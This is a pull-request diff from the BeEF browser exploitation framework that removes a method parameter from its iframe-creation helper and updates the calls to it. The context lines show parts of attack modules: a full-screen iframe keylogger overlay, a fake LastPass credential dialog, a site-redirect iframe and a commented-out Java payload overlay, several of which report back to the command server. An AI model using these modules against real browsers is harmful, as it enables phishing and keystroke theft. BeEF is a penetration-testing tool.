Merge pull request #972 from pgrohe/pgrohe/issue969

Pgrohe/issue969

core/main/client/dom.js

@@ -102,23 +102,19 @@ beef.dom = {
 	},
 	
 	/**
-     * Create and iFrame element. In case it's create with POST method, the iFrame is automatically added to the DOM and submitted.
-     * example usage in the code: beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
+     * Create an iFrame element and prepend to document body. URI passed via 'src' property of function's 'params' parameter
+     * is assigned to created iframe tag's src attribute resulting in GET request to that URI.
+     * example usage in the code: beef.dom.createIframe('fullscreen', {'src':$j(this).attr('href')}, {}, null);
 	 * @param: {String} type: can be 'hidden' or 'fullScreen'. defaults to normal
-	 * @param: {String} method: can be 'GET' or 'POST'. defaults to GET
 	 * @param: {Hash} params: list of params that will be sent in request.
 	 * @param: {Hash} styles: css styling attributes, these are merged with the defaults specified in the type parameter
 	 * @param: {Function} a callback function to fire once the iFrame has loaded
 	 * @return: {Object} the inserted iFrame
+     *
 	 */
-	createIframe: function(type, method, params, styles, onload) {
+	createIframe: function(type, params, styles, onload) {
 		var css = {};
-		var form_submit = (method.toLowerCase() == 'post') ? true : false; 
-		if (form_submit && params['src'])
-		{
-			var form_action = params['src'];
-			params['src'] = '';
-		}
+
 		if (type == 'hidden') {
 			css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles);
 		} else if (type == 'fullscreen') {
@@ -130,13 +126,6 @@ beef.dom = {
 		}
 		var iframe = $j('<iframe />').attr(params).css(css).load(onload).prependTo('body');
 		
-		if (form_submit && form_action)
-		{
-			var id = beef.dom.generateID();
-			$j(iframe).attr({'id': id, 'name':id});
-			var form = beef.dom.createForm({'action':form_action, 'method':'get', 'target':id}, false);
-			$j(form).prependTo('body').submit();
-		}
 		return iframe;
 	},
 

extensions/customhook/html/index.html

@@ -18,7 +18,7 @@
 
 <body>
 	<script>
-		setTimeout("beef.dom.createIframe('fullscreen','get',{'src':'<%= @customhook_target %>'},{},null)",2000);
+		setTimeout("beef.dom.createIframe('fullscreen', {'src':'<%= @customhook_target %>'},{},null)",2000);
 		document.body.scroll = "no";
 		document.documentElement.style.overflow = 'hidden';
 		//Porco dio - and away we go!

modules/browser/hooked_domain/site_redirect_iframe/command.js

@@ -14,7 +14,7 @@ beef.execute(function() {
 
 	$j("iframe").remove();
 	
-	beef.dom.createIframe('fullscreen', 'get', {'src':iframe_src}, {}, function() { if(!sent) { sent = true; document.title = title; beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+result); } });
+	beef.dom.createIframe('fullscreen', {'src':iframe_src}, {}, function() { if(!sent) { sent = true; document.title = title; beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+result); } });
 	document.body.scroll = "no";
 	document.documentElement.style.overflow = 'hidden';
 	beef.browser.changeFavicon(iframe_favicon);

modules/exploits/local_host/java_payload/command.js

@@ -28,7 +28,7 @@ beef.execute(function() {
 //    1. use the MITB code (currently doesn't work on IE)
 //    2. create an overlay iFrame while having the applet runnin in the background
 //
-//    1. setTimeout(beef.dom.createIframe('fullscreen', 'get', {'src':"<%= @iFrameSrc %>", 'id':"overlayiframe", 'name':"overlayiframe"}, {}, null), 4000);
+//    1. setTimeout(beef.dom.createIframe('fullscreen', {'src':"<%= @iFrameSrc %>", 'id':"overlayiframe", 'name':"overlayiframe"}, {}, null), 4000);
 //    2. beef.mitb.init("<%= @command_url %>", <%= @command_id %>);
 //		var MITBload = setInterval(function(){
 //				if(beef.pageIsLoaded){

modules/misc/iframe_keylogger/command.js

@@ -20,7 +20,7 @@ beef.execute(function() {
     }
 
     // creates the overlay 100% width/height iFrame
-    overlay = beef.dom.createIframe('fullscreen', 'get', {'src':"<%= @iFrameSrc %>", 'id':"overlayiframe", 'name':"overlayiframe"}, {}, null);
+    overlay = beef.dom.createIframe('fullscreen', {'src':"<%= @iFrameSrc %>", 'id':"overlayiframe", 'name':"overlayiframe"}, {}, null);
 
     if(beef.browser.isIE()){
        // listen for keypress events on the iFrame

modules/social_engineering/fake_lastpass/command.js

@@ -22,11 +22,11 @@ beef.execute(function() {
 	},false);	
 
 	if (beef.browser.isC()) {
-		beef.dom.createIframe('custom','get',{'src':beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/lp/index.html','id':'LPIFRAME'}, {'width':'375px','height':'415px','position':'fixed','right':'0px','top':'0px','z-index':beef.dom.getHighestZindex()+1,'border':'1px solid white','overflow':'hidden'}); 
+		beef.dom.createIframe('custom', {'src':beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/lp/index.html','id':'LPIFRAME'}, {'width':'375px','height':'415px','position':'fixed','right':'0px','top':'0px','z-index':beef.dom.getHighestZindex()+1,'border':'1px solid white','overflow':'hidden'}); 
 		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Chrome IFrame Created .. awaiting messages');	
 	} else {
 		// Don't know how NON Chrome browsers look - so just going to pop the FF dialog
-		beef.dom.createIframe('custom','get',{'src':beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/lp/indexFF.html','id':'LPIFRAME'}, {'width':'260px','height':'300px','position':'fixed','left':(($j(window).width()/2)-130)+'px','top':'0px','z-index':beef.dom.getHighestZindex()+1,'border':'0px solid black','overflow':'hidden'}); 
+		beef.dom.createIframe('custom' ,{'src':beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/lp/indexFF.html','id':'LPIFRAME'}, {'width':'260px','height':'300px','position':'fixed','left':(($j(window).width()/2)-130)+'px','top':'0px','z-index':beef.dom.getHighestZindex()+1,'border':'0px solid black','overflow':'hidden'}); 
 		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Non-Chrome IFrame Created .. awaiting messages');	
 	}